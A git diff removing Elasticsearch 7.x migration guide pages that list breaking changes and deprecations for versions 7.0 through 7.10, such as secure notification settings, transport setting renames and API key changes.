-[[watcher-notifications-account-settings]]
-==== Watcher notifications account settings
-
-The following settings have been removed in favor of the secure variants.
-The <> have to be defined inside each cluster
-node's keystore, i.e., they are not to be specified via the cluster settings API.
-
-- `xpack.notification.email.account..smtp.password`, instead use
-`xpack.notification.email.account..smtp.secure_password`
-- `xpack.notification.hipchat.account..auth_token`, instead use
-`xpack.notification.hipchat.account..secure_auth_token`
-- `xpack.notification.jira.account..url`, instead use
-`xpack.notification.jira.account..secure_url`
-- `xpack.notification.jira.account..user`, instead use
-`xpack.notification.jira.account..secure_user`
-- `xpack.notification.jira.account..password`, instead use
-`xpack.notification.jira.account..secure_password`
-- `xpack.notification.pagerduty.account..service_api_key`, instead use
-`xpack.notification.pagerduty.account..secure_service_api_key`
-- `xpack.notification.slack.account..url`, instead use
-`xpack.notification.slack.account..secure_url`
-
-[discrete]
-[[remove-audit-index-output]]
-==== Audit index output type removed
-
-All the settings under the `xpack.security.audit.index` namespace have been
-removed. In addition, the `xpack.security.audit.outputs` setting has been
-removed as well.
-
-These settings enabled and configured the audit index output type. This output
-type has been removed because it was unreliable in certain scenarios and this
-could have led to dropping audit events while the operations on the system
-were allowed to continue as usual. The recommended replacement is the
-use of the `logfile` audit output type and using other components from the
-Elastic Stack to handle the indexing part.
-
-[discrete]
-[[ingest-user-agent-ecs-always]]
-==== Ingest User Agent processor now uses the `ecs` output format by default
-https://github.com/elastic/ecs[ECS] format is now the default.
-The `ecs` setting for the user agent ingest processor now defaults to true.
-
-[discrete]
-[[remove-action-master-force_local]]
-==== Remove `action.master.force_local`
-
-The `action.master.force_local` setting was an undocumented setting, used
-internally by the tribe node to force reads to local cluster state (instead of
-forwarding to a master, which tribe nodes did not have). Since the tribe
-node was removed, this setting was removed too.
-
-[discrete]
-==== Enforce cluster-wide shard limit
-The cluster-wide shard limit is now enforced and not optional. The limit can
-still be adjusted as desired using the cluster settings API.
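-
-For example, the limit can be adjusted with the cluster settings API through the
-`cluster.max_shards_per_node` setting; the value below is only illustrative:
-
-[source,console]
--------------------------------------------------
-PUT /_cluster/settings
-{
-  "persistent": {
-    "cluster.max_shards_per_node": 1500
-  }
-}
------------------------------------------------- 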
-
-[discrete]
-==== HTTP Max content length setting is no longer parsed leniently
-Previously, `http.max_content_length` would reset to `100mb` if the setting was
-greater than `Integer.MAX_VALUE`. This leniency has been removed.
diff --git a/docs/reference/migration/migrate_7_0/snapshotstats.asciidoc b/docs/reference/migration/migrate_7_0/snapshotstats.asciidoc
deleted file mode 100644
index 5f181de7b72..00000000000
--- a/docs/reference/migration/migrate_7_0/snapshotstats.asciidoc
+++ /dev/null
@@ -1,23 +0,0 @@
-[discrete]
-[[breaking_70_snapshotstats_changes]]
-=== Snapshot stats changes
-
-//NOTE: The notable-breaking-changes tagged regions are re-used in the
-//Installation and Upgrade Guide
-
-//tag::notable-breaking-changes[]
-
-// end::notable-breaking-changes[]
-
-Snapshot stats details are provided in a new structured way:
-
-* `total` section for all the files that are referenced by the snapshot.
-* `incremental` section for those files that actually needed to be copied over as part of the incremental snapshotting.
-* In case of a snapshot that's still in progress, there's also a `processed` section for files that are in the process of being copied.
-
-[discrete]
-[[snapshot-stats-deprecated]]
-==== Deprecated `number_of_files`, `processed_files`, `total_size_in_bytes` and `processed_size_in_bytes` snapshot stats properties have been removed
-
-* Properties `number_of_files` and `total_size_in_bytes` are removed and should be replaced by the values of the nested object `total`.
-* Properties `processed_files` and `processed_size_in_bytes` are removed and should be replaced by the values of the nested object `processed`.
\ No newline at end of file
diff --git a/docs/reference/migration/migrate_7_0/suggesters.asciidoc b/docs/reference/migration/migrate_7_0/suggesters.asciidoc
deleted file mode 100644
index 49186686523..00000000000
--- a/docs/reference/migration/migrate_7_0/suggesters.asciidoc
+++ /dev/null
@@ -1,21 +0,0 @@
-[discrete]
-[[breaking_70_suggesters_changes]]
-=== Suggesters changes
-
-//NOTE: The notable-breaking-changes tagged regions are re-used in the
-//Installation and Upgrade Guide
-
-//tag::notable-breaking-changes[]
-
-// end::notable-breaking-changes[]
-
-[discrete]
-==== Registration of suggesters in plugins has changed
-
-Plugins must now explicitly indicate the type of suggestion that they produce.
-
-[discrete]
-==== Phrase suggester now multiplies alpha
-Previously, the Laplace smoothing used by the phrase suggester added `alpha`,
-when it should instead multiply. This behavior has been changed and will
-affect suggester scores.
diff --git a/docs/reference/migration/migrate_7_1.asciidoc b/docs/reference/migration/migrate_7_1.asciidoc
deleted file mode 100644
index 095fb724eae..00000000000
--- a/docs/reference/migration/migrate_7_1.asciidoc
+++ /dev/null
@@ -1,67 +0,0 @@
-[[breaking-changes-7.1]]
-== Breaking changes in 7.1
-++++
-7.1
-++++
-
-This section discusses the changes that you need to be aware of when migrating
-your application to Elasticsearch 7.1.
-
-See also <> and <>.
-
-//NOTE: The notable-breaking-changes tagged regions are re-used in the
-//Installation and Upgrade Guide
-
-//tag::notable-breaking-changes[]
-
-// end::notable-breaking-changes[]
-
-[discrete]
-[[breaking_71_http_changes]]
-=== HTTP changes
-
-[discrete]
-==== Deprecation of old HTTP settings
-
-The `http.tcp_no_delay` setting is deprecated in 7.1. It is replaced by
-`http.tcp.no_delay`.
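-
-A sketch of the corresponding `elasticsearch.yml` change:
-
-[source,yaml]
--------------------------------------------------
-# Deprecated in 7.1:
-# http.tcp_no_delay: true
-
-# Replacement setting:
-http.tcp.no_delay: true
------------------------------------------------- 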
- -[discrete] -[[breaking_71_network_changes]] -=== Network changes - -[discrete] -==== Deprecation of old network settings - -The `network.tcp.connect_timeout` setting is deprecated in 7.1. This setting -was a fallback setting for `transport.connect_timeout`. To change the default -connection timeout for client connections, modify `transport.connect_timeout`. - -[discrete] -[[breaking_71_transport_changes]] -=== Transport changes - -//tag::notable-breaking-changes[] -[discrete] -==== Deprecation of old transport settings - -The following settings are deprecated in 7.1. Each setting has a replacement -setting that was introduced in 6.7. - -- `transport.tcp.port` is replaced by `transport.port` -- `transport.tcp.compress` is replaced by `transport.compress` -- `transport.tcp.connect_timeout` is replaced by `transport.connect_timeout` -- `transport.tcp_no_delay` is replaced by `transport.tcp.no_delay` -- `transport.profiles.profile_name.tcp_no_delay` is replaced by -`transport.profiles.profile_name.tcp.no_delay` -- `transport.profiles.profile_name.tcp_keep_alive` is replaced by -`transport.profiles.profile_name.tcp.keep_alive` -- `transport.profiles.profile_name.reuse_address` is replaced by -`transport.profiles.profile_name.tcp.reuse_address` -- `transport.profiles.profile_name.send_buffer_size` is replaced by `transport.profiles.profile_name.tcp.send_buffer_size` -- `transport.profiles.profile_name.receive_buffer_size` is replaced by `transport.profiles.profile_name.tcp.receive_buffer_size` - -// end::notable-breaking-changes[] - - - diff --git a/docs/reference/migration/migrate_7_10.asciidoc b/docs/reference/migration/migrate_7_10.asciidoc deleted file mode 100644 index 3d522114a21..00000000000 --- a/docs/reference/migration/migrate_7_10.asciidoc +++ /dev/null @@ -1,233 +0,0 @@ -[[migrating-7.10]] -== Migrating to 7.10 -++++ -7.10 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to {es} 7.10. - -See also <> and <>. - -// * <> -// * <> - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - - - -[discrete] -[[breaking-changes-7.10]] -=== Breaking changes - -The following changes in {es} 7.10 might affect your applications -and prevent them from operating normally. -Before upgrading to 7.10, review these changes and take the described steps -to mitigate the impact. - -NOTE: Breaking changes introduced in minor versions are -normally limited to security and bug fixes. -Significant changes in behavior are deprecated in a minor release and -the old behavior is supported until the next major release. -To find out if you are using any deprecated functionality, -enable <>. - - -//tag::notable-breaking-changes[] - -[discrete] -[[breaking_710_security_changes]] -==== Authentication changes - -[[api-keys-require-name-property]] -.API keys now require a `name` property. -[%collapsible] -==== -*Details* + -The `name` property is now required to create or grant an API key. - -[source,js] ----- -{ - "...": "...", - "api_key": { - "name": "key-1" - } -} ----- -// NOTCONSOLE - -*Impact* + -To avoid errors, specify the `name` property when creating or granting API keys. -==== - -[discrete] -[[breaking_710_java_changes]] -==== Java changes - -[[supplier-searchlookup-arg]] -.The `MappedFieldType#fielddataBuilder` method now accepts a `Supplier` argument. 
-[%collapsible] -==== -*Details* + -To support future feature development, the existing -`MappedFieldType#fielddataBuilder` method now accepts a new -`Supplier` argument. - -*Impact* + -If you develop or maintain a mapper plugin, update your implementation of the -`MappedFieldType#fielddataBuilder` method to accommodate the new signature. -==== - -[discrete] -[[breaking_710_networking_changes]] -==== Networking changes - -[keep-idle-and-keep-internal-limits] -.The `*.tcp.keep_idle` and `*.tcp.keep_interval` settings are now limited to `300` seconds. -[%collapsible] -==== -*Details* + -The `{network,transport,http}.tcp.keep_idle` and -`{network,transport,http}.tcp.keep_interval` settings now have a maximum -value of `300` seconds, equivalent to 5 minutes. - -*Impact* + -If specified, ensure the `{network,transport,http}.tcp.keep_idle` and -`{network,transport,http}.tcp.keep_interval` settings do not exceed `300` -seconds. Setting `{network,transport,http}.tcp.keep_idle` or -`{network,transport,http}.tcp.keep_interval` to a value greater than `300` -seconds in `elasticsearch.yml` will result in an error on startup. -==== - -[discrete] -[[breaking_710_search_changes]] -==== Search changes - -[[max-doc-value-field-search-limits]] -.The `index.max_docvalue_fields_search` setting now limits doc value fields returned by `inner_hits` or the `top_hits` aggregation. -[%collapsible] -==== -*Details* + -The `index.max_docvalue_fields_search` setting limits the number of doc value -fields retrieved by a search. Previously, this setting applied only to doc value -fields returned by the `docvalue_fields` parameter in a top-level search. The -setting now also applies to doc value fields returned by an `inner_hits` section -or `top_hits` aggregation. - -*Impact* + -If you use `inner_hits` or the `top_hits` aggregation, ensure -`index.max_docvalue_fields_search` is configured correctly for your use case. -==== - -//end::notable-breaking-changes[] - -[discrete] -[[deprecated-7.10]] -=== Deprecations - -The following functionality has been deprecated in {es} 7.10 -and will be removed in 8.0 -While this won't have an immediate impact on your applications, -we strongly encourage you take the described steps to update your code -after upgrading to 7.10. - -NOTE: Significant changes in behavior are deprecated in a minor release and -the old behavior is supported until the next major release. -To find out if you are using any deprecated functionality, -enable <>. - -[discrete] -[[breaking_710_indices_changes]] -==== Indices deprecations - -[[bc-deprecate-rest-api-access-to-system-indices]] -.REST API access to system indices is deprecated. -[%collapsible] -==== -*Details* + -We are deprecating REST API access to system indices. 
Most REST API requests -that attempt to access system indices will return the following deprecation -warning: - -[source,text] ----- -this request accesses system indices: [.system_index_name], but in a future -major version, direct access to system indices will be prevented by default ----- - -The following REST API endpoints access system indices as part of their -implementation and will not return the deprecation warning: - -* `GET _cluster/health` -* `GET {index}/_recovery` -* `GET _cluster/allocation/explain` -* `GET _cluster/state` -* `POST _cluster/reroute` -* `GET {index}/_stats` -* `GET {index}/_segments` -* `GET {index}/_shard_stores` -* `GET _cat/[indices,aliases,health,recovery,shards,segments]` - -*Impact* + -To avoid deprecation warnings, do not use unsupported REST APIs to access system -indices. -==== - -[discrete] -[[breaking_710_ml_changes]] -==== Machine learning deprecations - -[[ml-allow-no-deprecations]] -.The `allow_no_jobs` and `allow_no_datafeeds` API parameters are deprecated. -[%collapsible] -==== -*Details* + -The `allow_no_jobs` and `allow_no_datafeeds` parameters in {ml} APIs are -deprecated in favor of `allow_no_match`. The old parameters are still accepted -by the APIs but a deprecation warning is emitted when the old parameter name is -used in the request body or as a request parameter. High-level REST client -classes now send the new `allow_no_match` parameter. - -*Impact* + -To avoid deprecation warnings, use the `allow_no_match` parameter. -==== - -[discrete] -[[breaking_710_mapping_changes]] -==== Mapping deprecations - -[[mapping-boosts]] -.The `boost` parameter on field mappings has been deprecated. -[%collapsible] -==== -*Details* + -Index-time boosts have been deprecated since the 5.x line, but it is still possible -to declare field-specific boosts in the mappings. This is now deprecated as well, -and will be removed entirely in 8.0.0. Mappings containing field boosts will continue -to work in 7.x but will emit a deprecation warning. - -*Impact* + -The `boost` setting should be removed from templates and mappings. Use boosts -directly on queries instead. -==== - -[discrete] -[[breaking_710_snapshot_restore_changes]] -==== Snapshot and restore deprecations - -[[respository-stats-api-deprecated]] -.The repository stats API has been deprecated. -[%collapsible] -==== -*Details* + -The repository stats API was introduced as an experimental API in 7.8.0. The -{ref}/repositories-metering-apis.html[repositories metering APIs] now replace the -repository stats API. The repository stats API has been deprecated and will be -removed in 8.0.0. - -*Impact* + -Use the {ref}/repositories-metering-apis.html[repositories metering APIs]. -Discontinue use of the repository stats API. -==== diff --git a/docs/reference/migration/migrate_7_2.asciidoc b/docs/reference/migration/migrate_7_2.asciidoc deleted file mode 100644 index a16a3db1870..00000000000 --- a/docs/reference/migration/migrate_7_2.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[breaking-changes-7.2]] -== Breaking changes in 7.2 -++++ -7.2 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.2. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -[discrete] -[[breaking_72_discovery_changes]] -=== Discovery changes - -[discrete] -==== Only a single port may be given for each seed host. 
- -In earlier versions you could include a range of ports in entries in the -`discovery.seed_hosts` list, but {es} used only the first port in the range and -unexpectedly ignored the rest. For instance if you set `discovery.seed_hosts: -"10.11.12.13:9300-9310"` then {es} would only use `10.11.12.13:9300` for -discovery. Seed host addresses containing port ranges are now rejected. - -// end::notable-breaking-changes[] \ No newline at end of file diff --git a/docs/reference/migration/migrate_7_3.asciidoc b/docs/reference/migration/migrate_7_3.asciidoc deleted file mode 100644 index 21e44da86ef..00000000000 --- a/docs/reference/migration/migrate_7_3.asciidoc +++ /dev/null @@ -1,80 +0,0 @@ -[[breaking-changes-7.3]] -== Breaking changes in 7.3 -++++ -7.3 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.3. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_73_api_changes]] -=== API changes - -[discrete] -==== {dataframe-transform-cap} API changes - -It is no longer possible to supply the `format` parameter when you define a -`date_histogram` {dataframe-transform} pivot. Previously constructed transforms -will still run but the configured `format` will be ignored. - -[discrete] -[[breaking_73_mapping_changes]] -=== Mapping changes -`dense_vector` field now requires `dims` parameter, specifying the number of -dimensions for document and query vectors for this field. - -[discrete] -==== Defining multi-fields within multi-fields - -Previously, it was possible to define a multi-field within a multi-field. -Defining chained multi-fields is now deprecated and will no longer be supported -in 8.0. To resolve the issue, all instances of `fields` that occur within a -`fields` block should be removed from the mappings, either by flattening the -chained `fields` blocks into a single level, or by switching to `copy_to` if -appropriate. - -[discrete] -[[breaking_73_plugin_changes]] -=== Plugins changes - -[discrete] -==== IndexStorePlugin changes - -IndexStore and DirectoryService have been replaced by a stateless and simple -DirectoryFactory interface to create custom Lucene directory instances per shard. - - -[discrete] -[[breaking_73_search_changes]] -=== Search changes - -[discrete] -==== Deprecation of queries - -The `common` query has been deprecated. The same functionality can be achieved -by the `match` query if the total number of hits is not tracked. - -[discrete] -===== Deprecation of query parameters - -The `cutoff_frequency` parameter has been deprecated for `match` and `multi_match` -queries. The same functionality can be achieved without any configuration provided -that the total number of hits is not tracked. - -[discrete] -[[breaking_73_ccr_changes]] -=== CCR changes - -[discrete] -==== Directly modifying aliases of follower indices is no longer allowed - -Aliases are now replicated to a follower from its leader, so directly modifying -aliases on follower indices is no longer allowed. 
-// end::notable-breaking-changes[] \ No newline at end of file diff --git a/docs/reference/migration/migrate_7_4.asciidoc b/docs/reference/migration/migrate_7_4.asciidoc deleted file mode 100644 index 5a87ddd0c52..00000000000 --- a/docs/reference/migration/migrate_7_4.asciidoc +++ /dev/null @@ -1,208 +0,0 @@ -[[breaking-changes-7.4]] -== Breaking changes in 7.4 -++++ -7.4 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.4. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -//end::notable-breaking-changes[] - -[discrete] -[[breaking_74_plugin_changes]] -=== Plugins changes - -[discrete] -==== TokenizerFactory changes - -TokenizerFactory now has a `name()` method that must be implemented. Most -plugin-provided TokenizerFactory implementations will extend `AbstractTokenizerFactory`, -which now takes a `name` parameter in its constructor. - -[discrete] -[[breaking_74_search_changes]] -=== Search Changes - -[discrete] -==== Forbid empty doc values in vector functions -If a document doesn't have a value for a vector field (dense_vector -or sparse_vector) on which a vector function is executed, an error will -be thrown. - -[discrete] -==== Use float instead of double for query vectors -Previously, vector functions like `cosineSimilarity` represented the query -vector as an list of doubles. Now vector functions use floats, which matches -how the stored document vectors are represented. - -[discrete] -[[breaking_74_snapshots_changes]] -=== Snapshot and Restore changes - -[discrete] -==== The S3 repository plugin uses the DNS style access pattern by default - -Starting in version 7.4 the `repository-s3` plugin does not use the -now-deprecated path-style access pattern by default. In versions 7.0, 7.1, 7.2 -and 7.3 the `repository-s3` plugin always used the path-style access pattern. -This is a breaking change for deployments that only support path-style access -but which are recognized as supporting DNS-style access by the AWS SDK. If your -deployment only supports path-style access and is affected by this change then -you must configure the S3 client setting `path_style_access` to `true`. This -breaking change was made necessary by -https://aws.amazon.com/blogs/aws/amazon-s3-path-deprecation-plan-the-rest-of-the-story/[AWS's -announcement] that the path-style access pattern is deprecated and will be -unsupported on buckets created after September 30th 2020. - -[discrete] -[[breaking_74_http_changes]] -=== HTTP changes - -[discrete] -==== Changes to Encoding Plus Signs in URLs - -Starting in version 7.4, a `+` in a URL will be encoded as `%2B` by all REST API functionality. Prior versions handled a `+` as a single space. -If your application requires handling `+` as a single space you can return to the old behaviour by setting the system property -`es.rest.url_plus_as_space` to `true`. Note that this behaviour is deprecated and setting this system property to `true` will cease -to be supported in version 8. - -[discrete] -[[breaking_74_cluster_changes]] -=== Cluster changes - -[discrete] -==== Rerouting after starting a shard runs at lower priority - -After starting each shard the elected master node must perform a reroute to -search for other shards that could be allocated. In particular, when creating -an index it is this task that allocates the replicas once the primaries have -started. 
In versions prior to 7.4 this task runs at priority `URGENT`, but -starting in version 7.4 its priority is reduced to `NORMAL`. In a -well-configured cluster this reduces the amount of work the master must do, but -means that a cluster with a master that is overloaded with other tasks at -`HIGH` or `URGENT` priority may take longer to allocate all replicas. - -Additionally, before 7.4 the `GET -_cluster_health?wait_for_no_initializing_shards` and `GET -_cluster/health?wait_for_no_relocating_shards` APIs would return only once all -pending reroutes have completed too, but starting in version 7.4 if you want to -wait for the rerouting process to completely finish you should add the -`wait_for_events=languid` query parameter when calling these APIs. - -[discrete] -[[breaking_74_allocation_changes]] -=== Allocation changes - -[discrete] -==== Auto-release of read-only-allow-delete block - -If a node exceeds the flood-stage disk watermark then {es} adds the -`index.blocks.read_only_allow_delete` block to all of its indices to prevent -further writes, as a last-resort attempt to prevent the node completely -exhausting its disk space. In earlier versions this block would remain in place -until manually removed, causing confusion for users who currently have ample -disk space and who are not aware that they nearly ran out at some point in the -past. From 7.4 onwards the block is automatically removed when the node drops -below the high watermark again, with the expectation that the high watermark is -some distance below the flood-stage watermark and therefore the disk space -problem is truly resolved. Since this block may be automatically removed, you -can no longer rely on adding this block manually to prevent writes to an index. -You should use the `index.blocks.read_only` block instead. This behaviour can -be disabled by setting the system property -`es.disk.auto_release_flood_stage_block` to `false`. - -[discrete] -[[breaking_74_settings_changes]] -=== Settings changes - -[discrete] -[[breaking_74_unique_realm_names]] -==== Authentication realm name uniqueness is enforced - -Authentication realm name uniqueness is now enforced. If you configure more than one realm of any type -with the same name, the node fails to start. - -[discrete] -[[deprecate-pidfile]] -==== `pidfile` setting is being replaced by `node.pidfile` - -To ensure that all settings are in a proper namespace, the `pidfile` setting is -deprecated, and will be removed in version 8.0.0. Instead, use `node.pidfile`. - -[discrete] -[[deprecate-processors]] -==== `processors` setting is being replaced by `node.processors` - -To ensure that all settings are in a proper namespace, the `processors` setting -is deprecated, and will be removed in version 8.0.0. Instead, use -`node.processors`. - -[discrete] -[[breaking_74_transform_changes]] -=== {transform-cap} changes - -[discrete] -[[transform_stats_format]] -==== Stats response format changes - -The response format of the <> is very different -to previous versions: - -- `task_state` and `indexer_state` are combined into a single `state` field - that replaces the old `state` object. -- Within the `checkpointing` object, `current` is renamed to `last` and - `in_progress` to `next`. -- The `checkpoint` number is now nested under `last` and `next`. -- `checkpoint_progress` is now reported in an object nested in the `next` - checkpoint object. (If there is no `next` checkpoint then no checkpoint is - in progress and by definition the `last` checkpoint is 100% complete.) 
- -For an example of the new format see <>. - -[discrete] -[[breaking_74_df_analytics_changes]] -=== {dfanalytics-cap} changes - -[discrete] -[[progress_reporting_change]] -==== Changes to progress reporting - -The single integer `progress_percent` field at the top level of the -{dfanalytics-job} stats is replaced by a `progress` field that is an array -of objects. Each object contains the `phase` name and `progress_percent` of one -phase of the analytics. For example: - -[source,js] ----- -{ - "id" : "my_job", - "state" : "analyzing", - "progress" : [ - { - "phase" : "reindexing", - "progress_percent" : 100 - }, - { - "phase" : "loading_data", - "progress_percent" : 100 - }, - { - "phase" : "analyzing", - "progress_percent" : 47 - }, - { - "phase" : "writing_results", - "progress_percent" : 0 - } - ] -} ----- -// NOTCONSOLE diff --git a/docs/reference/migration/migrate_7_5.asciidoc b/docs/reference/migration/migrate_7_5.asciidoc deleted file mode 100644 index 7db1961f86d..00000000000 --- a/docs/reference/migration/migrate_7_5.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[breaking-changes-7.5]] -== Breaking changes in 7.5 -++++ -7.5 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.5. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -//end::notable-breaking-changes[] - -[discrete] -[[breaking_75_search_changes]] -=== Search Changes - -[discrete] -==== Stricter checking for wildcard queries on _index -Previously, a wildcard query on the `_index` field matched directly against the -fully-qualified index name. Now, in order to match against remote indices like -`cluster:index`, the query must contain a colon, as in `cl*ster:inde*`. This -behavior aligns with the way indices are matched in the search endpoint. diff --git a/docs/reference/migration/migrate_7_6.asciidoc b/docs/reference/migration/migrate_7_6.asciidoc deleted file mode 100644 index 7c82fb271a3..00000000000 --- a/docs/reference/migration/migrate_7_6.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[[breaking-changes-7.6]] -== Breaking changes in 7.6 -++++ -7.6 -++++ - -This section discusses the changes that you need to be aware of when migrating -your application to Elasticsearch 7.6. - -See also <> and <>. - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] -[discrete] -[[breaking_76_security_changes]] -=== Security changes - -[discrete] -==== {es} API key privileges - -If you use an API key to create another API key (sometimes called a -_derived key_), its behavior is impacted by the fix for -https://www.elastic.co/community/security[CVE-2020-7009]. - -When you make a request to create API keys, you can specify an expiration and -privileges for the API key. Previously, when you created a derived key, it had -no privileges. This behavior disregarded any privileges that you specified in -the {ref}/security-api-create-api-key.html[create API key API]. - -As of 7.6.2, this behavior changes. To create a derived key, you must explicitly -specify a role descriptor with no privileges: - -[source,js] ----- -... -"role_descriptors": { - "no-privilege": { - } -} -... 
-----
-// NOTCONSOLE
-
-//end::notable-breaking-changes[]
-
-[discrete]
-[[breaking_76_search_changes]]
-=== Search changes
-
-[discrete]
-==== Aggregating and sorting on `_id` is deprecated
-It's possible to aggregate and sort on the built-in `_id` field by loading an
-expensive data structure called fielddata. This was deprecated in 7.6 and will
-be disallowed by default in 8.0. As an alternative, the `_id` field's contents
-can be duplicated into another field with docvalues enabled (note that this
-does not apply to auto-generated IDs).
-
-[discrete]
-==== Deprecation of sparse vector fields
-The `sparse_vector` field type has been deprecated and will be removed in 8.0.
-We have not seen much interest in this experimental field type, and don't see
-a clear use case as it's currently designed. If you have feedback or
-suggestions around sparse vector functionality, please let us know through
-GitHub or the 'discuss' forums.
-
-[discrete]
-==== Update to vector function signatures
-The vector functions of the form `function(query, doc['field'])` are
-deprecated, and the form `function(query, 'field')` should be used instead.
-For example, `cosineSimilarity(query, doc['field'])` is replaced by
-`cosineSimilarity(query, 'field')`.
-
-[discrete]
-==== Disallow use of the `nGram` and `edgeNGram` tokenizer names
-
-The `nGram` and `edgeNGram` tokenizer names have been deprecated in 7.6.
-Mappings for indices created after 7.6 will continue to work but emit a
-deprecation warning. The tokenizer name should be changed to the fully
-equivalent `ngram` or `edge_ngram` names for new indices and in index
-templates.
diff --git a/docs/reference/migration/migrate_7_7.asciidoc b/docs/reference/migration/migrate_7_7.asciidoc
deleted file mode 100644
index 33d18eaf4d3..00000000000
--- a/docs/reference/migration/migrate_7_7.asciidoc
+++ /dev/null
@@ -1,118 +0,0 @@
-[[breaking-changes-7.7]]
-== Breaking changes in 7.7
-++++
-7.7
-++++
-
-This section discusses the changes that you need to be aware of when migrating
-your application to Elasticsearch 7.7.
-
-See also <> and <>.
-
-//NOTE: The notable-breaking-changes tagged regions are re-used in the
-//Installation and Upgrade Guide
-
-//tag::notable-breaking-changes[]
-[discrete]
-[[breaking_77_logging_changes]]
-=== Logging changes
-
-[discrete]
-==== Loggers under `org.elasticsearch.action` now log at `INFO` level by default
-
-The default log level for most loggers is `INFO`, but in earlier versions
-loggers in the `org.elasticsearch.action.*` hierarchy emitted log messages at
-`DEBUG` level by default. This sometimes resulted in a good deal of unnecessary
-log noise. From 7.7 onwards the default log level for loggers in this hierarchy
-is now `INFO`, in line with most other loggers. If needed, you can recover the
-pre-7.7 default behaviour by adjusting your {ref}/logging.html[logging].
-
-[discrete]
-[[breaking_77_mapping_changes]]
-=== Mapping changes
-
-[discrete]
-[[stricter-mapping-validation]]
-==== Validation for dynamic templates
-
-Previously, misconfiguration of dynamic templates was only discovered when indexing
-a document with an unmapped field. In {es} 8.0 and later versions, dynamic mappings
-have stricter validation, done at mapping update time. Invalid updates, such as using
-incorrect analyzer settings or unknown field types, fail. For
-indices created in {es} 7.7 and later versions, the update succeeds but emits a warning.
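-
-For example, a dynamic template along the lines of the following sketch, where
-the index name is made up and `no_such_analyzer` is intentionally invalid,
-fails at mapping update time in {es} 8.0 and emits a warning for indices
-created in 7.7 and later:
-
-[source,js]
-----
-PUT my-index
-{
-  "mappings": {
-    "dynamic_templates": [
-      {
-        "strings_as_text": {
-          "match_mapping_type": "string",
-          "mapping": {
-            "type": "text",
-            "analyzer": "no_such_analyzer" <1>
-          }
-        }
-      }
-    ]
-  }
-}
-----
-// NOTCONSOLE
-<1> The analyzer does not exist; previously this was only detected when a string field was first dynamically mapped.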
-
-
-[discrete]
-[[breaking_77_settings_changes]]
-=== Settings changes
-
-[discrete]
-[[deprecate-listener-thread-pool]]
-==== `thread_pool.listener.size` and `thread_pool.listener.queue_size` have been deprecated
-The listener thread pool is no longer used internally by Elasticsearch.
-Therefore, these settings have been deprecated. You can safely remove these
-settings from the configuration of your nodes.
-
-[discrete]
-[[deprecate-cluster-remote-connect]]
-==== `cluster.remote.connect` is deprecated in favor of `node.remote_cluster_client`
-Previously, the setting `cluster.remote.connect` was used to configure whether or
-not the local node is capable of acting as a remote cluster client in
-cross-cluster search and cross-cluster replication. This setting is deprecated
-in favor of `node.remote_cluster_client`, which serves the same purpose and identifies
-the local node as having the `remote_cluster_client` role.
-
-[discrete]
-[[deprecate-missing-realm-order]]
-==== Authentication realm `order` will be a required config in version 8.0.0.
-
-The `order` config will be required in version 8.0.0 for authentication realm
-configuration of any type. If the `order` config is missing for a realm, the node
-will fail to start.
-
-[discrete]
-[[deprecate-duplicated-realm-orders]]
-==== Authentication realm `order` uniqueness will be enforced in version 8.0.0.
-
-The `order` config of authentication realms must be unique in version 8.0.0.
-If you configure more than one realm of any type with the same order, the node will fail to start.
-
-[discrete]
-[[deprecate-insecure-monitoring-password]]
-==== Deprecation of insecure monitoring password setting
-
-The `auth.password` setting for the monitoring HTTP exporter has been deprecated and will be
-removed in version 8.0.0. Please use the `auth.secure_password` setting instead.
-
-[discrete]
-[[breaking_77_search_changes]]
-=== Search changes
-
-[discrete]
-==== Consistent rounding of range queries on `date_range` fields
-`range` queries on `date_range` fields can currently have slightly different
-boundaries than their equivalent query on a pure `date` field. This can happen,
-for example, when using date math or dates that don't specify up to the last
-millisecond. While queries on `date` fields round up to the latest millisecond
-for `gt` and `lte` boundaries, the same queries on `date_range` fields didn't
-do this. The behavior is now the same for both field types, as documented in
-{ref}/query-dsl-range-query.html#range-query-date-math-rounding[Date math and rounding].
-
-[discrete]
-==== Pipeline aggregation validation errors
-The pipeline aggregation validation has been moved to the coordinating node.
-Those errors that used to return HTTP 500/Internal Server Error now return
-400/Bad Request, and we now return a list of validation errors rather than only
-the first one we encounter.
-
-[discrete]
-[[breaking_77_highlighters_changes]]
-=== Highlighters changes
-
-[discrete]
-==== Ignored keyword values are no longer highlighted
-If a keyword value was ignored during indexing because of its length
-(`ignore_above` parameter was applied), {es} doesn't attempt to
-highlight it anymore, which means no highlights are produced for
-ignored values.
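-
-As an illustrative sketch (the index and field names are invented), a keyword
-field mapped with `ignore_above` no longer produces highlights for values that
-exceed the configured length:
-
-[source,js]
-----
-PUT my-index
-{
-  "mappings": {
-    "properties": {
-      "tags": {
-        "type": "keyword",
-        "ignore_above": 20 <1>
-      }
-    }
-  }
-}
-----
-// NOTCONSOLE
-<1> Values longer than 20 characters are ignored at index time and, from 7.7 onwards, are no longer highlighted.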
-//end::notable-breaking-changes[]
diff --git a/docs/reference/migration/migrate_7_8.asciidoc b/docs/reference/migration/migrate_7_8.asciidoc
deleted file mode 100644
index d38852b327a..00000000000
--- a/docs/reference/migration/migrate_7_8.asciidoc
+++ /dev/null
@@ -1,214 +0,0 @@
-[[breaking-changes-7.8]]
-== Breaking changes in 7.8
-++++
-7.8
